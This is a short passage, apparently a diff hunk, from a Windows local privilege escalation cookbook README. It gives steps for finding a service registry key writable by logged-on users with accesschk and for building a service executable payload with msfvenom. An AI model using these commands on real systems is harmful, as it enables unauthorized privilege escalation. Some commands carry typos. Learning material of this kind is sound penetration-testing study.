nickvourd/Windows-Local-Privilege-Escalation-Cookbook/README.md

  * Find from which group is accessible this service
     * accesschk.exe /accepteula -uvwqk hklm\System\CurrentControleSet\Service\\\<servicename>

+    * found if note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users).

  * generate a payload:
    * msfvenom –p windows/exec CMD=\<Command> -f exe-services –o \<service binery>